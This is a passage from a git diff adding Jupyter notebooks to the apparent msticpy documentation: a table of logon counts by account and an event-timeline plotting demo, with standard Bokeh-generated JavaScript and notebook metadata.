clearInterval(timer);\n          console.log(\"Bokeh: ERROR: Unable to run BokehJS code because BokehJS library is missing\");\n        }\n      }\n    }, 10, root)\n  }\n})(window);"
+     },
+     "metadata": {
+      "application/vnd.bokehjs_exec.v0+json": {
+       "id": "2292"
+      }
+     }
+    },
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "Column(id='2292', ...)"
+      ],
+      "text/html": [
+       "<div style=\"display: table;\"><div style=\"display: table-row;\"><div style=\"display: table-cell;\"><b title=\"bokeh.models.layouts.Column\">Column</b>(</div><div style=\"display: table-cell;\">id&nbsp;=&nbsp;'2292', <span id=\"2522\" style=\"cursor: pointer;\">&hellip;)</span></div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">align&nbsp;=&nbsp;'start',</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">aspect_ratio&nbsp;=&nbsp;None,</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">background&nbsp;=&nbsp;None,</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">children&nbsp;=&nbsp;[Figure(id='2200', ...), Figure(id='2232', ...)],</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">css_classes&nbsp;=&nbsp;[],</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">disabled&nbsp;=&nbsp;False,</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height&nbsp;=&nbsp;None,</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">height_policy&nbsp;=&nbsp;'auto',</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_event_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">js_property_callbacks&nbsp;=&nbsp;{},</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">margin&nbsp;=&nbsp;(0, 0, 0, 0),</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_height&nbsp;=&nbsp;None,</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">max_width&nbsp;=&nbsp;None,</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_height&nbsp;=&nbsp;None,</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">min_width&nbsp;=&nbsp;None,</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">name&nbsp;=&nbsp;None,</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">rows&nbsp;=&nbsp;'auto',</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">sizing_mode&nbsp;=&nbsp;None,</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">spacing&nbsp;=&nbsp;0,</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">subscribed_events&nbsp;=&nbsp;[],</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">tags&nbsp;=&nbsp;[],</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">visible&nbsp;=&nbsp;True,</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width&nbsp;=&nbsp;None,</div></div><div class=\"2521\" style=\"display: none;\"><div style=\"display: table-cell;\"></div><div style=\"display: table-cell;\">width_policy&nbsp;=&nbsp;'auto')</div></div></div>\n",
+       "<script>\n",
+       "(function() {\n",
+       "  var expanded = false;\n",
+       "  var ellipsis = document.getElementById(\"2522\");\n",
+       "  ellipsis.addEventListener(\"click\", function() {\n",
+       "    var rows = document.getElementsByClassName(\"2521\");\n",
+       "    for (var i = 0; i < rows.length; i++) {\n",
+       "      var el = rows[i];\n",
+       "      el.style.display = expanded ? \"none\" : \"table-row\";\n",
+       "    }\n",
+       "    ellipsis.innerHTML = expanded ? \"&hellip;)\" : \"&lsaquo;&lsaquo;&lsaquo;\";\n",
+       "    expanded = !expanded;\n",
+       "  });\n",
+       "})();\n",
+       "</script>\n"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 13
+    }
+   ],
+   "metadata": {}
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 14,
+   "source": [
+    "# Counts of Logon types by Account\n",
+    "host_logons[['Account', 'LogonType', 'TimeGenerated']].groupby(['Account','LogonType']).count()"
+   ],
+   "outputs": [
+    {
+     "output_type": "execute_result",
+     "data": {
+      "text/plain": [
+       "                                         TimeGenerated\n",
+       "Account                       LogonType               \n",
+       "MSTICAlertsWin1\\MSTICAdmin    4                      2\n",
+       "MSTICAlertsWin1\\adm1nistrator 3                      1\n",
+       "NT AUTHORITY\\SYSTEM           5                     11"
+      ],
+      "text/html": [
+       "<div>\n",
+       "<style scoped>\n",
+       "    .dataframe tbody tr th:only-of-type {\n",
+       "        vertical-align: middle;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe tbody tr th {\n",
+       "        vertical-align: top;\n",
+       "    }\n",
+       "\n",
+       "    .dataframe thead th {\n",
+       "        text-align: right;\n",
+       "    }\n",
+       "</style>\n",
+       "<table border=\"1\" class=\"dataframe\">\n",
+       "  <thead>\n",
+       "    <tr style=\"text-align: right;\">\n",
+       "      <th></th>\n",
+       "      <th></th>\n",
+       "      <th>TimeGenerated</th>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>Account</th>\n",
+       "      <th>LogonType</th>\n",
+       "      <th></th>\n",
+       "    </tr>\n",
+       "  </thead>\n",
+       "  <tbody>\n",
+       "    <tr>\n",
+       "      <th>MSTICAlertsWin1\\MSTICAdmin</th>\n",
+       "      <th>4</th>\n",
+       "      <td>2</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>MSTICAlertsWin1\\adm1nistrator</th>\n",
+       "      <th>3</th>\n",
+       "      <td>1</td>\n",
+       "    </tr>\n",
+       "    <tr>\n",
+       "      <th>NT AUTHORITY\\SYSTEM</th>\n",
+       "      <th>5</th>\n",
+       "      <td>11</td>\n",
+       "    </tr>\n",
+       "  </tbody>\n",
+       "</table>\n",
+       "</div>"
+      ]
+     },
+     "metadata": {},
+     "execution_count": 14
+    }
+   ],
+   "metadata": {}
+  }
+ ],
+ "metadata": {
+  "celltoolbar": "Tags",
+  "hide_input": false,
+  "kernelspec": {
+   "display_name": "Python 3",
+   "language": "python",
+   "name": "python3"
+  },
+  "language_info": {
+   "codemirror_mode": {
+    "name": "ipython",
+    "version": 3
+   },
+   "file_extension": ".py",
+   "mimetype": "text/x-python",
+   "name": "python",
+   "nbconvert_exporter": "python",
+   "pygments_lexer": "ipython3",
+   "version": "3.7.9"
+  },
+  "latex_envs": {
+   "LaTeX_envs_menu_present": true,
+   "autoclose": false,
+   "autocomplete": true,
+   "bibliofile": "biblio.bib",
+   "cite_by": "apalike",
+   "current_citInitial": 1,
+   "eqLabelWithNumbers": true,
+   "eqNumInitial": 1,
+   "hotkeys": {
+    "equation": "Ctrl-E",
+    "itemize": "Ctrl-I"
+   },
+   "labels_anchors": false,
+   "latex_user_defs": false,
+   "report_style_numbering": false,
+   "user_envs_cfg": false
+  },
+  "toc": {
+   "base_numbering": 1,
+   "nav_menu": {
+    "height": "318.996px",
+    "width": "320.994px"
+   },
+   "number_sections": false,
+   "sideBar": true,
+   "skip_h1_title": false,
+   "title_cell": "Table of Contents",
+   "title_sidebar": "Contents",
+   "toc_cell": true,
+   "toc_position": {
+    "height": "calc(100% - 180px)",
+    "left": "10px",
+    "top": "150px",
+    "width": "165px"
+   },
+   "toc_section_display": true,
+   "toc_window_display": true
+  },
+  "varInspector": {
+   "cols": {
+    "lenName": 16,
+    "lenType": 16,
+    "lenVar": 40
+   },
+   "kernels_config": {
+    "python": {
+     "delete_cmd_postfix": "",
+     "delete_cmd_prefix": "del ",
+     "library": "var_list.py",
+     "varRefreshCmd": "print(var_dic_list())"
+    },
+    "r": {
+     "delete_cmd_postfix": ") ",
+     "delete_cmd_prefix": "rm(",
+     "library": "var_list.r",
+     "varRefreshCmd": "cat(var_dic_list()) "
+    }
+   },
+   "position": {
+    "height": "406.193px",
+    "left": "1468.4px",
+    "right": "20px",
+    "top": "120px",
+    "width": "456.572px"
+   },
+   "types_to_exclude": [
+    "module",
+    "function",
+    "builtin_function_or_method",
+    "instance",
+    "_Feature"
+   ],
+   "window_display": false
+  },
+  "widgets": {
+   "application/vnd.jupyter.widget-state+json": {
+    "state": {},
+    "version_major": 2,
+    "version_minor": 0
+   }
+  }
+ },
+ "nbformat": 4,
+ "nbformat_minor": 4
+}
\ No newline at end of file
diff --git a/docs/notebooks/EventTimeline.ipynb b/docs/notebooks/EventTimeline.ipynb
new file mode 100644
index 000000000..6e9a22587
--- /dev/null
+++ b/docs/notebooks/EventTimeline.ipynb
@@ -0,0 +1,1775 @@
+{
+ "cells": [
+  {
+   "cell_type": "markdown",
+   "metadata": {
+    "toc": true
+   },
+   "source": [
+    "<h1>Table of Contents<span class=\"tocSkip\"></span></h1>\n",
+    "<div class=\"toc\"><ul class=\"toc-item\"><li><span><a href=\"#msticpy---Event-Timeline\" data-toc-modified-id=\"msticpy---Event-Timeline-1\">msticpy - Event Timeline</a></span></li><li><span><a href=\"#Discrete-Event-Timelines\" data-toc-modified-id=\"Discrete-Event-Timelines-2\">Discrete Event Timelines</a></span><ul class=\"toc-item\"><li><span><a href=\"#Plotting-a-simple-timeline\" data-toc-modified-id=\"Plotting-a-simple-timeline-2.1\">Plotting a simple timeline</a></span></li><li><span><a href=\"#More-Advanced-Timelines\" data-toc-modified-id=\"More-Advanced-Timelines-2.2\">More Advanced Timelines</a></span><ul class=\"toc-item\"><li><span><a href=\"#Grouping-Series-From-a-Single-DataFrame\" data-toc-modified-id=\"Grouping-Series-From-a-Single-DataFrame-2.2.1\">Grouping Series From a Single DataFrame</a></span></li></ul></li><li><span><a href=\"#Displaying-a-reference-line\" data-toc-modified-id=\"Displaying-a-reference-line-2.3\">Displaying a reference line</a></span></li><li><span><a href=\"#Plotting-series-from-different-data-sets\" data-toc-modified-id=\"Plotting-series-from-different-data-sets-2.4\">Plotting series from different data sets</a></span></li></ul></li><li><span><a href=\"#Plotting-Series-with-Scalar-Values\" data-toc-modified-id=\"Plotting-Series-with-Scalar-Values-3\">Plotting Series with Scalar Values</a></span><ul class=\"toc-item\"><li><span><a href=\"#Documentation-for-display_timeline_values\" data-toc-modified-id=\"Documentation-for-display_timeline_values-3.1\">Documentation for display_timeline_values</a></span></li></ul></li><li><span><a href=\"#Exporting-Plots-as-PNGs\" data-toc-modified-id=\"Exporting-Plots-as-PNGs-4\">Exporting Plots as PNGs</a></span></li></ul></div>"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# msticpy - Event Timeline\n",
+    "\n",
+    "This notebook demonstrates the use of the timeline displays built using the [Bokeh library](https://bokeh.pydata.org).\n",
+    "\n",
+    "You must have msticpy installed:\n",
+    "```\n",
+    "%pip install --upgrade msticpy\n",
+    "```\n",
+    "\n",
+    "There are two display types:\n",
+    "- Discrete event series - this plots multiple series of events as discrete glyphs\n",
+    "- Event value series - this plots a scalar value of the events using glyphs, bars or traditional line graph (or some combination."
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 1,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-01-30T20:46:28.835951Z",
+     "start_time": "2020-01-30T20:46:26.259919Z"
+    },
+    "scrolled": true
+   },
+   "outputs": [],
+   "source": [
+    "# Imports\r\n",
+    "import sys\r\n",
+    "import warnings\r\n",
+    "\r\n",
+    "from msticpy.common.utility import check_py_version\r\n",
+    "MIN_REQ_PYTHON = (3,6)\r\n",
+    "check_py_version(MIN_REQ_PYTHON)\r\n",
+    "\r\n",
+    "import ipywidgets as widgets\r\n",
+    "\r\n",
+    "import pandas as pd\r\n",
+    "pd.set_option('display.max_rows', 100)\r\n",
+    "pd.set_option('display.max_columns', 50)\r\n",
+    "pd.set_option('display.max_colwidth', 100)\r\n",
+    "\r\n",
+    "from msticpy.nbtools.timeline import display_timeline\r\n",
+    "\r\n",
+    "WIDGET_DEFAULTS = {'layout': widgets.Layout(width='95%'),\r\n",
+    "                   'style': {'description_width': 'initial'}}\r\n"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "# Discrete Event Timelines\r\n",
+    "\r\n",
+    "## Plotting a simple timeline\r\n",
+    "\r\n",
+    "`display_timeline`\r\n"
+   ]
+  },
+  {
+   "cell_type": "code",
+   "execution_count": 2,
+   "metadata": {
+    "ExecuteTime": {
+     "end_time": "2020-01-30T20:46:28.957882Z",
+     "start_time": "2020-01-30T20:46:28.836950Z"
+    }
+   },
+   "outputs": [
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "    <div class=\"bk-root\">\n",
+       "        <a href=\"https://bokeh.org\" target=\"_blank\" class=\"bk-logo bk-logo-small bk-logo-notebook\"></a>\n",
+       "        <span id=\"1002\">Loading BokehJS ...</span>\n",
+       "    </div>"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "\n(function(root) {\n  function now() {\n    return new Date();\n  }\n\n  var force = true;\n\n  if (typeof root._bokeh_onload_callbacks === \"undefined\" || force === true) {\n    root._bokeh_onload_callbacks = [];\n    root._bokeh_is_loading = undefined;\n  }\n\n  var JS_MIME_TYPE = 'application/javascript';\n  var HTML_MIME_TYPE = 'text/html';\n  var EXEC_MIME_TYPE = 'application/vnd.bokehjs_exec.v0+json';\n  var CLASS_NAME = 'output_bokeh rendered_html';\n\n  /**\n   * Render data to the DOM node\n   */\n  function render(props, node) {\n    var script = document.createElement(\"script\");\n    node.appendChild(script);\n  }\n\n  /**\n   * Handle when an output is cleared or removed\n   */\n  function handleClearOutput(event, handle) {\n    var cell = handle.cell;\n\n    var id = cell.output_area._bokeh_element_id;\n    var server_id = cell.output_area._bokeh_server_id;\n    // Clean up Bokeh references\n    if (id != null && id in Bokeh.index) {\n      Bokeh.index[id].model.document.clear();\n      delete Bokeh.index[id];\n    }\n\n    if (server_id !== undefined) {\n      // Clean up Bokeh references\n      var cmd = \"from bokeh.io.state import curstate; print(curstate().uuid_to_server['\" + server_id + \"'].get_sessions()[0].document.roots[0]._id)\";\n      cell.notebook.kernel.execute(cmd, {\n        iopub: {\n          output: function(msg) {\n            var id = msg.content.text.trim();\n            if (id in Bokeh.index) {\n              Bokeh.index[id].model.document.clear();\n              delete Bokeh.index[id];\n            }\n          }\n        }\n      });\n      // Destroy server and session\n      var cmd = \"import bokeh.io.notebook as ion; ion.destroy_server('\" + server_id + \"')\";\n      cell.notebook.kernel.execute(cmd);\n    }\n  }\n\n  /**\n   * Handle when a new output is added\n   */\n  function handleAddOutput(event, handle) {\n    var output_area = handle.output_area;\n    var output = handle.output;\n\n    // limit handleAddOutput to display_data with EXEC_MIME_TYPE content only\n    if ((output.output_type != \"display_data\") || (!Object.prototype.hasOwnProperty.call(output.data, EXEC_MIME_TYPE))) {\n      return\n    }\n\n    var toinsert = output_area.element.find(\".\" + CLASS_NAME.split(' ')[0]);\n\n    if (output.metadata[EXEC_MIME_TYPE][\"id\"] !== undefined) {\n      toinsert[toinsert.length - 1].firstChild.textContent = output.data[JS_MIME_TYPE];\n      // store reference to embed id on output_area\n      output_area._bokeh_element_id = output.metadata[EXEC_MIME_TYPE][\"id\"];\n    }\n    if (output.metadata[EXEC_MIME_TYPE][\"server_id\"] !== undefined) {\n      var bk_div = document.createElement(\"div\");\n      bk_div.innerHTML = output.data[HTML_MIME_TYPE];\n      var script_attrs = bk_div.children[0].attributes;\n      for (var i = 0; i < script_attrs.length; i++) {\n        toinsert[toinsert.length - 1].firstChild.setAttribute(script_attrs[i].name, script_attrs[i].value);\n        toinsert[toinsert.length - 1].firstChild.textContent = bk_div.children[0].textContent\n      }\n      // store reference to server id on output_area\n      output_area._bokeh_server_id = output.metadata[EXEC_MIME_TYPE][\"server_id\"];\n    }\n  }\n\n  function register_renderer(events, OutputArea) {\n\n    function append_mime(data, metadata, element) {\n      // create a DOM node to render to\n      var toinsert = this.create_output_subarea(\n        metadata,\n        CLASS_NAME,\n        EXEC_MIME_TYPE\n      );\n      this.keyboard_manager.register_events(toinsert);\n      // Render to node\n      var props = {data: data, metadata: metadata[EXEC_MIME_TYPE]};\n      render(props, toinsert[toinsert.length - 1]);\n      element.append(toinsert);\n      return toinsert\n    }\n\n    /* Handle when an output is cleared or removed */\n    events.on('clear_output.CodeCell', handleClearOutput);\n    events.on('delete.Cell', handleClearOutput);\n\n    /* Handle when a new output is added */\n    events.on('output_added.OutputArea', handleAddOutput);\n\n    /**\n     * Register the mime type and append_mime function with output_area\n     */\n    OutputArea.prototype.register_mime_type(EXEC_MIME_TYPE, append_mime, {\n      /* Is output safe? */\n      safe: true,\n      /* Index of renderer in `output_area.display_order` */\n      index: 0\n    });\n  }\n\n  // register the mime type if in Jupyter Notebook environment and previously unregistered\n  if (root.Jupyter !== undefined) {\n    var events = require('base/js/events');\n    var OutputArea = require('notebook/js/outputarea').OutputArea;\n\n    if (OutputArea.prototype.mime_types().indexOf(EXEC_MIME_TYPE) == -1) {\n      register_renderer(events, OutputArea);\n    }\n  }\n\n  \n  if (typeof (root._bokeh_timeout) === \"undefined\" || force === true) {\n    root._bokeh_timeout = Date.now() + 5000;\n    root._bokeh_failed_load = false;\n  }\n\n  var NB_LOAD_WARNING = {'data': {'text/html':\n     \"<div style='background-color: #fdd'>\\n\"+\n     \"<p>\\n\"+\n     \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n     \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n     \"</p>\\n\"+\n     \"<ul>\\n\"+\n     \"<li>re-rerun `output_notebook()` to attempt to load from CDN again, or</li>\\n\"+\n     \"<li>use INLINE resources instead, as so:</li>\\n\"+\n     \"</ul>\\n\"+\n     \"<code>\\n\"+\n     \"from bokeh.resources import INLINE\\n\"+\n     \"output_notebook(resources=INLINE)\\n\"+\n     \"</code>\\n\"+\n     \"</div>\"}};\n\n  function display_loaded() {\n    var el = document.getElementById(\"1002\");\n    if (el != null) {\n      el.textContent = \"BokehJS is loading...\";\n    }\n    if (root.Bokeh !== undefined) {\n      if (el != null) {\n        el.textContent = \"BokehJS \" + root.Bokeh.version + \" successfully loaded.\";\n      }\n    } else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(display_loaded, 100)\n    }\n  }\n\n\n  function run_callbacks() {\n    try {\n      root._bokeh_onload_callbacks.forEach(function(callback) {\n        if (callback != null)\n          callback();\n      });\n    } finally {\n      delete root._bokeh_onload_callbacks\n    }\n    console.debug(\"Bokeh: all callbacks have finished\");\n  }\n\n  function load_libs(css_urls, js_urls, callback) {\n    if (css_urls == null) css_urls = [];\n    if (js_urls == null) js_urls = [];\n\n    root._bokeh_onload_callbacks.push(callback);\n    if (root._bokeh_is_loading > 0) {\n      console.debug(\"Bokeh: BokehJS is being loaded, scheduling callback at\", now());\n      return null;\n    }\n    if (js_urls == null || js_urls.length === 0) {\n      run_callbacks();\n      return null;\n    }\n    console.debug(\"Bokeh: BokehJS not loaded, scheduling load and callback at\", now());\n    root._bokeh_is_loading = css_urls.length + js_urls.length;\n\n    function on_load() {\n      root._bokeh_is_loading--;\n      if (root._bokeh_is_loading === 0) {\n        console.debug(\"Bokeh: all BokehJS libraries/stylesheets loaded\");\n        run_callbacks()\n      }\n    }\n\n    function on_error(url) {\n      console.error(\"failed to load \" + url);\n    }\n\n    for (let i = 0; i < css_urls.length; i++) {\n      const url = css_urls[i];\n      const element = document.createElement(\"link\");\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.rel = \"stylesheet\";\n      element.type = \"text/css\";\n      element.href = url;\n      console.debug(\"Bokeh: injecting link tag for BokehJS stylesheet: \", url);\n      document.body.appendChild(element);\n    }\n\n    const hashes = {\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\": \"XypntL49z55iwGVUW4qsEu83zKL3XEcz0MjuGOQ9SlaaQ68X/g+k1FcioZi7oQAc\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\": \"bEsM86IHGDTLCS0Zod8a8WM6Y4+lafAL/eSiyQcuPzinmWNgNO2/olUF0Z2Dkn5i\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\": \"TX0gSQTdXTTeScqxj6PVQxTiRW8DOoGVwinyi1D3kxv7wuxQ02XkOxv0xwiypcAH\"};\n\n    for (let i = 0; i < js_urls.length; i++) {\n      const url = js_urls[i];\n      const element = document.createElement('script');\n      element.onload = on_load;\n      element.onerror = on_error.bind(null, url);\n      element.async = false;\n      element.src = url;\n      if (url in hashes) {\n        element.crossOrigin = \"anonymous\";\n        element.integrity = \"sha384-\" + hashes[url];\n      }\n      console.debug(\"Bokeh: injecting script tag for BokehJS library: \", url);\n      document.head.appendChild(element);\n    }\n  };\n\n  function inject_raw_css(css) {\n    const element = document.createElement(\"style\");\n    element.appendChild(document.createTextNode(css));\n    document.body.appendChild(element);\n  }\n\n  \n  var js_urls = [\"https://cdn.bokeh.org/bokeh/release/bokeh-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-widgets-2.3.2.min.js\", \"https://cdn.bokeh.org/bokeh/release/bokeh-tables-2.3.2.min.js\"];\n  var css_urls = [];\n  \n\n  var inline_js = [\n    function(Bokeh) {\n      Bokeh.set_log_level(\"info\");\n    },\n    function(Bokeh) {\n    \n    \n    }\n  ];\n\n  function run_inline_js() {\n    \n    if (root.Bokeh !== undefined || force === true) {\n      \n    for (var i = 0; i < inline_js.length; i++) {\n      inline_js[i].call(root, root.Bokeh);\n    }\n    if (force === true) {\n        display_loaded();\n      }} else if (Date.now() < root._bokeh_timeout) {\n      setTimeout(run_inline_js, 100);\n    } else if (!root._bokeh_failed_load) {\n      console.log(\"Bokeh: BokehJS failed to load within specified timeout.\");\n      root._bokeh_failed_load = true;\n    } else if (force !== true) {\n      var cell = $(document.getElementById(\"1002\")).parents('.cell').data().cell;\n      cell.output_area.append_execute_result(NB_LOAD_WARNING)\n    }\n\n  }\n\n  if (root._bokeh_is_loading === 0) {\n    console.debug(\"Bokeh: BokehJS loaded, going straight to plotting\");\n    run_inline_js();\n  } else {\n    load_libs(css_urls, js_urls, function() {\n      console.debug(\"Bokeh: BokehJS plotting callback run at\", now());\n      run_inline_js();\n    });\n  }\n}(window));",
+      "application/vnd.bokehjs_load.v0+json": ""
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "text/html": [
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "\n",
+       "  <div class=\"bk-root\" id=\"30b23de7-4b30-4a44-aa32-1afc73ae91df\" data-root-id=\"1073\"></div>\n"
+      ]
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    },
+    {
+     "data": {
+      "application/javascript": "(function(root) {\n  function embed_document(root) {\n    \n  var docs_json = {\"bbc6fdf4-d0af-4eda-8c71-7e077d61546d\":{\"defs\":[],\"roots\":{\"references\":[{\"attributes\":{\"children\":[{\"id\":\"1005\"},{\"id\":\"1037\"}]},\"id\":\"1073\",\"type\":\"Column\"},{\"attributes\":{},\"id\":\"1079\",\"type\":\"AllLabels\"},{\"attributes\":{\"axis_label\":\"Event Time\",\"formatter\":{\"id\":\"1066\"},\"major_label_policy\":{\"id\":\"1079\"},\"ticker\":{\"id\":\"1017\"}},\"id\":\"1016\",\"type\":\"DatetimeAxis\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1099\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"overlay\":{\"id\":\"1062\"},\"x_range\":{\"id\":\"1008\"},\"y_range\":null},\"id\":\"1061\",\"type\":\"RangeTool\"},{\"attributes\":{\"months\":[0,6]},\"id\":\"1096\",\"type\":\"MonthsTicker\"},{\"attributes\":{},\"id\":\"1110\",\"type\":\"YearsTicker\"},{\"attributes\":{},\"id\":\"1097\",\"type\":\"YearsTicker\"},{\"attributes\":{\"num_minor_ticks\":5,\"tickers\":[{\"id\":\"1099\"},{\"id\":\"1100\"},{\"id\":\"1101\"},{\"id\":\"1102\"},{\"id\":\"1103\"},{\"id\":\"1104\"},{\"id\":\"1105\"},{\"id\":\"1106\"},{\"id\":\"1107\"},{\"id\":\"1108\"},{\"id\":\"1109\"},{\"id\":\"1110\"}]},\"id\":\"1049\",\"type\":\"DatetimeTicker\"},{\"attributes\":{},\"id\":\"1085\",\"type\":\"UnionRenderers\"},{\"attributes\":{},\"id\":\"1042\",\"type\":\"DataRange1d\"},{\"attributes\":{\"below\":[{\"id\":\"1016\"}],\"center\":[{\"id\":\"1019\"},{\"id\":\"1023\"}],\"height\":300,\"left\":[{\"id\":\"1020\"}],\"min_border_left\":50,\"renderers\":[{\"id\":\"1071\"}],\"title\":{\"id\":\"1006\"},\"toolbar\":{\"id\":\"1030\"},\"width\":900,\"x_range\":{\"id\":\"1008\"},\"x_scale\":{\"id\":\"1012\"},\"y_range\":{\"id\":\"1010\"},\"y_scale\":{\"id\":\"1014\"}},\"id\":\"1005\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1102\",\"type\":\"DaysTicker\"},{\"attributes\":{\"active_multi\":{\"id\":\"1061\"},\"tools\":[{\"id\":\"1061\"}]},\"id\":\"1052\",\"type\":\"Toolbar\"},{\"attributes\":{\"below\":[{\"id\":\"1048\"},{\"id\":\"1053\"}],\"center\":[{\"id\":\"1051\"}],\"height\":120,\"renderers\":[{\"id\":\"1059\"}],\"title\":{\"id\":\"1038\"},\"toolbar\":{\"id\":\"1052\"},\"toolbar_location\":null,\"width\":900,\"x_range\":{\"id\":\"1040\"},\"x_scale\":{\"id\":\"1044\"},\"y_range\":{\"id\":\"1042\"},\"y_scale\":{\"id\":\"1046\"}},\"id\":\"1037\",\"subtype\":\"Figure\",\"type\":\"Plot\"},{\"attributes\":{\"num_minor_ticks\":10,\"tickers\":[{\"id\":\"1086\"},{\"id\":\"1087\"},{\"id\":\"1088\"},{\"id\":\"1089\"},{\"id\":\"1090\"},{\"id\":\"1091\"},{\"id\":\"1092\"},{\"id\":\"1093\"},{\"id\":\"1094\"},{\"id\":\"1095\"},{\"id\":\"1096\"},{\"id\":\"1097\"}]},\"id\":\"1017\",\"type\":\"DatetimeTicker\"},{\"attributes\":{\"mantissas\":[1,2,5],\"max_interval\":500.0,\"num_minor_ticks\":0},\"id\":\"1086\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"active_multi\":null,\"tools\":[{\"id\":\"1004\"},{\"id\":\"1024\"},{\"id\":\"1025\"},{\"id\":\"1026\"},{\"id\":\"1027\"},{\"id\":\"1028\"}]},\"id\":\"1030\",\"type\":\"Toolbar\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1087\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"base\":60,\"mantissas\":[1,2,5,10,15,20,30],\"max_interval\":1800000.0,\"min_interval\":1000.0,\"num_minor_ticks\":0},\"id\":\"1100\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1048\"},\"ticker\":null},\"id\":\"1051\",\"type\":\"Grid\"},{\"attributes\":{\"days\":[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31]},\"id\":\"1089\",\"type\":\"DaysTicker\"},{\"attributes\":{\"base\":24,\"mantissas\":[1,2,4,6,8,12],\"max_interval\":43200000.0,\"min_interval\":3600000.0,\"num_minor_ticks\":0},\"id\":\"1101\",\"type\":\"AdaptiveTicker\"},{\"attributes\":{\"axis\":{\"id\":\"1016\"},\"minor_grid_line_alpha\":0.3,\"minor_grid_line_color\":\"navy\",\"ticker\":null},\"id\":\"1019\",\"type\":\"Grid\"},{\"attributes\":{\"end\":1547530280011.0,\"start\":1547525311999.0},\"id\":\"1008\",\"type\":\"Range1d\"},{\"attributes\":{\"dimensions\":\"width\"},\"id\":\"1024\",\"type\":\"WheelZoomTool\"},{\"attributes\":{},\"id\":\"1027\",\"type\":\"SaveTool\"},{\"attributes\":{\"fill_alpha\":{\"value\":0.1},\"fill_color\":{\"value\":\"navy\"},\"line_alpha\":{\"value\":0.1},\"line_color\":{\"value\":\"navy\"},\"marker\":{\"value\":\"diamond\"},\"size\":{\"value\":10},\"x\":{\"field\":\"TimeGenerated\"},\"y\":{\"field\"